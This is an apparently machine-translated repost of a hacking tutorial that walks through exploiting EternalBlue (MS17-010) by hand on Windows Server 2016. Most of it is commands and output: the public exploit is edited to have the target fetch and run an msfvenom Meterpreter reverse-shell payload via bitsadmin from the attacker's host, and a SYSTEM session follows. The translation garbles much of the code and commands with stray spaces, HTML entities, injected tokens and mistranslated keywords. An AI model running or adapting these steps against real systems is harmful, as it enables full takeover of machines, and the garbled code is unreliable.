قالب وردپرس درنا توس
Home / Tips and Tricks / Manual Utilization of EternalBlue on Windows Server with MS17-010 Python Exploit «Null Byte :: WonderHowTo

Manual Utilization of EternalBlue on Windows Server with MS17-010 Python Exploit «Null Byte :: WonderHowTo



EternalBlue was a devastating attack aimed at Microsoft's implementation of the SMB protocol. Metasploit contains a useful module that automatically exploits a target as long as it is vulnerable. But what if we wanted to exploit this vulnerability without Metasploit holding our hand? With the help of a Python file EternalBlue can be used manually.

I'm not going to go into the whole game about what EternalBlue is, where the exploit came from, or how SMB works, as I've already described in the previous tutorial Using EternalBlue on Windows Server with Metasploit. If you would like more background information about EternalBlue and SMB, and how to determine if a target is vulnerable or not, you should check this before proceeding.

In this guide we will tackle the manual way of using EternalBlue on Windows Server. I am using an unpatched copy of Windows Server 201

6 Datacenter as a target, and evaluation copies can be downloaded from Microsoft if you want to do the following:

Step 1: Setting Up the Python-based Software Exploit

First we need to search the exploit file. On Kali we can use searchsploit in the terminal to search the database for a hit.

  searchsploit eternalblue 
  --------------- --------------------------- ----------------------- --------------------------- ----------------------- --------------------------- ----------------------- ----- ---------------------- ------------------
Exploit title | path
| (/ usr / share / exploitdb /)
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -------------------- ------------------------------ ----------
Microsoft Windows Windows 7/2008 R2 - SMB Remote Code Execution & # 39; EternalBlue & # 39; (MS17-010) | Exploits / windows / remote / 42031.py
Microsoft Windows Windows 7 / 8.1 / 2008 R2 / 2016 R2 - SMB Remote Code Execution & # 39; EternalBlue & # 39; (MS17-010) | Exploits / windows / remote / 42315.py
Microsoft Windows Windows 8 / 8.1 / 2012 R2 (x64) - SMB Remote Code Execution & # 39; EternalBlue & # 39; (MS17-010) | Exploits / windows_x86-64 / remote / 42030.py
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -------------------- ------------------------------ ----------
Shellcodes: No result
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------- ----------------------------------- - --------
Paper Title | path
| (/ usr / share / exploitdb-papers /)
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------- ----------------------------------- - --------
How to use ETERNALBLUE and DOUBLEPULSAR under Windows 7/2008 | docs / german / 41896-how-to-exploit-eternal-blue
How to use ETERNALBLUE under Windows Server 2012 R2 docs / German / 42280-how-to-exploit-ewigblue-
[Spanish] Using ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008 | docs / spanish / 41897- [spanish] - how to use et
[Spanish] Using ETERNALBLUE on Windows Server 2012 R2 | docs / spanish / 42281- [spanish] -like-to-exploit-et
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------- ----------------------------------- - -------- 

The desired exploit is labeled 42315.py . To keep things in order, we create a directory from which to work.

  mkdir exploit 

Now we can copy the exploit file into our newly created directory.

  cp / usr / share / exploitdb / exploits / windows / remote / 42315.py / root / exploit / 

Then go to the directory and see if the file exists.

  cd exploit /
ls 
  42315.py 

Now we can look at the source code for more information about this exploit. This is a fairly long file, so we can use the command less to display it from the top.

  less 42315.py 
  #! / Usr / bin / python
by impacket import smb, smbconnection
from mysmb import MYSMB
unpack from struct import pack, unpack_from
Import sys
import base
import time

& # 39; & # 39; & # 39;
MS17-010 exploit for Windows 2000 and higher from sleepya

EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py

Note:
- The exploit should never crash a target (chance should be close to 0%)
- The exploit uses the error as well as Eternal Rotation and Eternal Synergy, so a named pipe is needed

Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240x64
- Windows 2012 R2 x64
- Windows 8.1x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
& # 39; & # 39; & # 39;

USERNAME = & # 39; & # 39;
PASSWORD = & # 39; & # 39;

& # 39; & # 39; & # 39;
A transaction with an empty setup:
- It is assigned from a paged pool (like other transaction types) under Windows 7 and later
- it is assigned by private heap (RtlAllocateHeap ()) without it being used on Windows Vista and earlier versions
- No lookaside or caching method for assignment

Note: The method name comes from the NSA eternity

For Windows 7 and above, it is advisable to use the matched pair method (one is a large pool and another is appropriate
for released pool from the large pool). In addition, the exploit leads to the leakage of information to verify transactions
Alignment before OOB writing. Therefore, this exploit should never crash a target against Windows 7 and higher.

... 

This Exploit requires a valid named pipe (we'll get there soon) and a valid set of credentials. This may be other credentials of a user who has logged on to the destination in the past, including guest accounts. When the exploit runs, it is automatically updated to a privileged account.

Before proceeding, it is advisable to make a copy of this file so we can access the original source code. We can rename it exploit.py to keep it simple.

  cp 42315.py exploit.py
ls 
  42315.py exploit.py 

Now we can edit the Python file and enter a valid username and password.

  Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240x64
- Windows 2012 R2 x64
- Windows 8.1x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
& # 39; & # 39; & # 39;

USERNAME = & # 39; user & # 39;
PASSWORD = & # 39; Password & # 39;

& # 39; & # 39; & # 39;
A transaction with an empty setup:
- It is assigned from a paged pool (like other transaction types) under Windows 7 and later
- it is assigned by private heap (RtlAllocateHeap ()) without it being used on Windows Vista and earlier versions
- no lookaside or caching method for assignment 

Save it, and now we can try to execute the exploit.

  python exploit.py 
  Traceback (last call last):
File "exploit.py", line 3, in 
from mysmb import MYSMB
ImportError: No module named mysmb 

It appears that a module named mysmb should be imported. For this to work we need to download it. You can easily do that with wget .

  wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py[19659007(--2019-03-26) 11 tun : 25: 44 - https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
Auflösen von raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.148.133
Verbindung zu raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.148.133 |: 443 ... hergestellt.
HTTP-Anfrage gesendet, wartet auf Antwort ... 200 OK
Länge: 16669 (16K) [text/plain]
Save as: "mysmb.py"

mysmb.py 100% [=====================================================================================================================>] 16.28K --.- KB / s in 0.03s

2019-03-26 11:25:44 (528 KB / s) - & # 39; mysmb.py & # 39; saved [16669/16669] 

Try to run the file again and we will get another output.

  python exploit.py 
  exploit.py  [pipe_name] 

It now looks like usage information, which is a good sign. We have to insert the IP address of our destination and a pipe name as a parameter.

Step 2: Find Named Pipe

Named pipes are a way to communicate running processes with little effort. Pipes are usually displayed as files to which other processes can be attached. Metasploit has a scanner that finds named pipes on a host. In a new terminal, enter msfconsole to power it up, then you can search for the scanner.

  msfconsole
Search tube 
  Matching modules
==================

Date of disclosure of the name Rank Check the description
---- --------------- ---- ----- -----------
auxil / admin / db2 / db2rcmd 2004-03-04 normal No IBM DB2 db2rcmd.exe command execution vulnerability
Auxiliary / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command Execution
auxile / dos / http / nodejs_pipelining 2013-10-18 normal Yes Node.js HTTP pipelining denial-of-service
aux / dos / windows / smb / ms06_063_trans normal No Microsoft SRV.SYS pipe transaction No NULL value
aux / dos / windows / smb / rras_vls_null_deref 2006-06-14 normal No Microsoft RRAS interfaceAdjustVLSPointers NULL Dereference
aux / fuzzers / smb / smb_create_pipe normal No SMB Pipe Request Fuzzer
auxile / fuzzers / smb / smb_create_pipe_corrupt normal No corruption of SMB pipe requests
Auxiliary / Scanner / SMB / Pipe_auditor Normal Yes SMB Session Pipe Auditor
aux / scanner / smb / pipe_dcerpc_auditor normal Yes SMB session pipe DCERPC auditor
exploit / linux / misc / accellion_fta_mpipe2 2011-02-07 excellent No acceleration FTA MPIPE2 - Command execution
exploit / linux / samba / is_known_pipename 2017-03-24 awarded Yes Samba is_known_pipename () Loading modules at random
Exploit / multi / http / mediawiki_syntaxhighlight 2017-04-06 Good Yes Vulnerability in MediaWiki SyntaxHighlight Extension Option
exploit / multi / svn / svnserve_date 2004-05-19 Average No Subversion Date svnserve

... 

What we want is the pipe_auditor . Load the module with the command and use the command .

  Use the utility helper / scanner / smb / pipe_auditor 

. Now we can look at the options.

  Options 
  Module options (Auxiliary / Scanner / SMB / Pipe_auditor):

Name Current setting Required description
---- --------------- -------- -----------
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The destination address range or CIDR identifier
SMB domain. no The Windows domain to be used for authentication
SMBPass no The password for the specified user name
SMBUser no The user name under which to authenticate
THREADS 1 yes The number of concurrent threads 

All we really need to do is specify the IP address of our target.

  Rhosts set 10.10.0.100 
  Rhosts => 10.10.0.100 

And then we can run the scanner.

  run 
  [+] 10.10.0.100:445 - Pipes:  netlogon,  lsarpc,  samr
[*] 10.10.0.100: - Scanned 1 of 1 hosts (100% complete)
[*] Execution of helper completed 

It looks like it has found some named pipes. Awesome.

Step 3: Run Exploit File

Now we should be able to run the exploit file. Back in the first terminal from Step 1, where we are still in the exploit directory, use the IP address of the target and one of the named pipes, which we found as parameters.

  python exploit.py 10.10.0.100 netlogon 
  Target Operating System: Windows Server 2016 Standard Evaluation 14393
Target is 64 bits
Received question size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffff928c5dc1e020
SESSION: 0xffffac016815e210
FLINK: 0xffffac0167062098
InParam: 0xffffac016705c16c
MID: 0x3303
Success control of the grooms transaction
Change trans1 struct for arbitrary read / write
Make this SMB session SYSTEM
Override session security context
Create the c:  pwned.txt file on the target
Done 

Some data is spewed out on the screen. Below is a text file created on the target. If we take a look at the target, we can see that it was successful.

However, we want to create more than just a text file on the target. This is just proof of the concept, so we still need to do a few things to make this exploit fully functional.

Step 4: Serve the Payload

We need a payload and a path for the exploit to obtain and execute it. For this we can use MSFvenom to generate shellcode, and we can deploy it from Apache via our computer.

In a new terminal, use the following command to generate the payload and save it to a file named sc .exe in the default web root for the Apache server.

  msfvenom -a x64 - Windows platform -p windows / x64 / meterpreter / reverse_tcp lhost = 10.10.0.1 lport = 4321 -e x64 / xor -i 5 -f exe -o / var / www / html / sc. find exe [19659007 × 1 compatible encoder
Attempt to encode the payload with 5 iterations of x64 / xor
x64 / xor succeeded with size 551 (iteration = 0)
x64 / xor succeeded with size 591 (iteration = 1)
x64 / xor succeeded with size 631 (iteration = 2)
x64 / xor succeeded with size 671 (iteration = 3)
x64 / xor succeeded with size 711 (iteration = 4)
x64 / x or with final size 711 selected
Payload size: 711 bytes
Final size of the exe file: 7168 bytes
Filed as: /var/www/html/sc.exe[19659008Thisisalongcommandtosummarizeitasashortcut:[196659060] The flag  -a  indicates the architecture as 64-bit. 19659064] The  Platform  option sets the platform as Windows.  
  • The flag -p indicates the payload.
  • Lhost is our local machine
  • lport is the local connection to which the connection is to be made.
  • The flag -e indicates the encoder to use. [1969090] The - The flag sets the number of iterations the encoder uses.
  • The flag -f determines the format.
  • The -o flag indicates the output file. 19659072] Now we can start the Apache server so that the exploit can connect to our computer from the target to reach the payload. Next we will adapt the code to our needs.

      service apache2 start 
  • Step 5: Change the code

    Again in exploit.py find the code section near the bottom that looks like this:

      def smb_pwn (conn , arch):
    smbConn = conn.get_smbconnection ()
    
    print (& # 39; create file c: \ pwned.txt on the destination & # 39;)
    tid2 = smbConn.connectTree (& # 39; C $ & # 39;
    fid2 = smbConn.createFile (tid2, & # 39; /pwned.txt')
    smbConn.closeFile (tid2, fid2)
    smbConn.disconnectTree (tid2)
    
    #smb_send_file (smbConn, sys.argv [0] & # 39; C & # 39 ;, & # 39; /exploit.py')
    #service_exec (conn, r # cmd / c copies c:  pwned.txt c:  pwned_exec.txt & # 39;
    # Note: There are many ways to get a shell through the SMB management session
    # An easy way to get Shell (but easily recognized by AV) is
    # binary executable generated by "msfvenom -f exe-service ..."
    
    def smb_send_file (smbConn, localSrc, remoteDrive, remotePath):
    with open (localSrc, & # 39; r) as fp:
    smbConn.putFile (remoteDrive + & # 39; $ & # 39 ;, remotePath, fp.read) 

    This is the code responsible for connecting to the target and creating the text file. We can also see an interesting-looking function called service_exec () which is commented out. This connects to the destination and issues a command to copy the previously created text file to a new text file named pwned_exec.txt on drive C. We can use this feature to pack our payload on the target.

    First remove the function and replace everything after cmd / c with the following command:

      bitsadmin / transfer pwn / download http://10.10.0.1/sc.exe C:  sc.exe 

    BITSAdmin is a Windows command-line tool used to upload or download files. The / transfer switch initializes a transfer (named pwn in this case) and / download indicates that it is a download. Then we enter the name of the remote file (hosted on our computer) and the name of the local file as soon as it is transferred.

    Add another function service_exec () and run the file we have just transferred. The code looks like this:

      service_exec (conn, r & # 39; cmd / c /sc.exe')[19659008Pinishlywecannotreallycommentonthesectionthatcommentsitoutratherthanlosingitagain:[196659023] ldef smb_pwn (conn, arch):
    smbConn = conn.get_smbconnection ()
    
    #print (& # 39; create file c: \ pwned.txt on the destination & # 39;)
    # tid2 = smbConn.connectTree (& # 39; C $ & # 39;
    # fid2 = smbConn.createFile (tid2, & # 39; /pwned.txt')
    # smbConn.closeFile (tid2, fid2)
    # smbConn.disconnectTree (tid2)
    
    #smb_send_file (smbConn, sys.argv [0] & # 39; C & # 39 ;, & # 39; /exploit.py')
    service_exec (conn, r # cmd / c bitsadmin / transfer pwn / download http://10.10.0.1/sc.exe C:  sc.exe & # 39;
    service_exec (conn, r & # 39; cmd / c /sc.exe & # 39;
    # Note: There are many ways to get a shell through the SMB management session
    # An easy way to get Shell (but easily recognized by AV) is
    # binary executable generated by "msfvenom -f exe-service ..."
    
    def smb_send_file (smbConn, localSrc, remoteDrive, remotePath):
    with open (localSrc, & # 39; r) as fp:
    smbConn.putFile (remoteDrive + & # 39; $ & # 39 ;, remotePath, fp.read) 

    Now all we have to do is run the exploit.

    Step 6: Execute the finished exploit

    To complete the exploit We need something to catch the hull as soon as the payload is executed. For this we can use the Multipurpose Handler in Metasploit. In a new terminal, use the following commands:

      msfconsole
    Use Exploit / Multi / Handler 

    The "Exploit (Multi / Handler)" prompt should be displayed. All we have to do is set the payload to match what we specified when we created the shell code, which in this case is a reverse TCP shell / meterpreter / reverse_tcp

    Next, set the appropriate listening host.

      set lhost 10.10.0.1 
      lhost => 10.10.0.1 

    and listening port => 4321

    And we can start the handler.

      run 
      [*] The reverse TCP handler was started on 10.10.0.1:4321[19659008GettinginboundconnectionsandifnothingrunssmoothlyonceourExploitiscloseditwillholdaMeterpretersession[196659002] Finally we should have everything ready and go. We can start the exploit exactly as we did in our test run from the exploit directory. 

      python exploit.py 10.10.0.100 netlogon 
      Target operating system: Windows Server 2016 Standard Evaluation 14393
    Target is 64 bits
    Received question size: 0x20
    GROOM_POOL_SIZE: 0x5030
    BRIDE_TRANS_SIZE: 0xf90
    CONNECTION: 0xffff928c5dc48020
    SESSION: 0xffffac0165773250
    FLINK: 0xffffac0167056098
    InParam: 0xffffac016705016c
    MID: 0x2a07
    Success control of the grooms transaction
    Change trans1 struct for arbitrary read / write
    Make this SMB session SYSTEM
    Override session security context
    Open SVCManager on 10.10.0.100 .....
    Create service Jepa .....
    Starting service Jepa .....
    SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond in time to the start or control request.
    Distance service Jepa .....
    Open SVCManager on 10.10.0.100 .....
    Create service YTXT .....
    Service YTXT is started .....
    The NETBIOS connection to the remote host has expired.
    Service YTXT is removed .....
    ServiceExec error on: 10.10.0.100
    nca_s_proto_error
    Done 

    This time, other results should be displayed. Ignore the errors and try again if it does not work the first time. Once the exploit has been successfully completed, another session should open with our listener.

      [*] Send Level (206403 bytes) to 10.10.0.100
    [*] Meterpreter Session 1 opened at 10.10.0.1:4321 → 10.10.0.100:51057 at 2019-03-26 11: 49: 38-0500
    
    meterpreter> 

    We can confirm that we have compromised the target with the command sysinfo .

      sysinfo 
      Computer: DC01
    Operating system: Windows 2016 (Build 14393).
    Architecture: x64
    System language: en_US
    Domain: DLAB
    Logged in users: 4
    Meterpreter: x64 / windows 

    And the command getuid .

      getuid 
      Server Username: NT AUTHORITY  SYSTEM 

    Summary

    This tutorial describes how to manually use EternalBlue on Windows Server. We first set up a few things to get the proof of concept working. Next, we generated shellcode and hosted the payload on our computer. After that, we changed the code, started the exploit, and successfully obtained a Meterpreter session for the target. Although Metasploit includes a module to do it all automatically, it's a good idea to know how to do things the hard way, just in case something needs to be adjusted for a specific goal or scenario.

    Cover image of Pixabay / Pexels; Screenshots of drd_ / zero byte

    Source link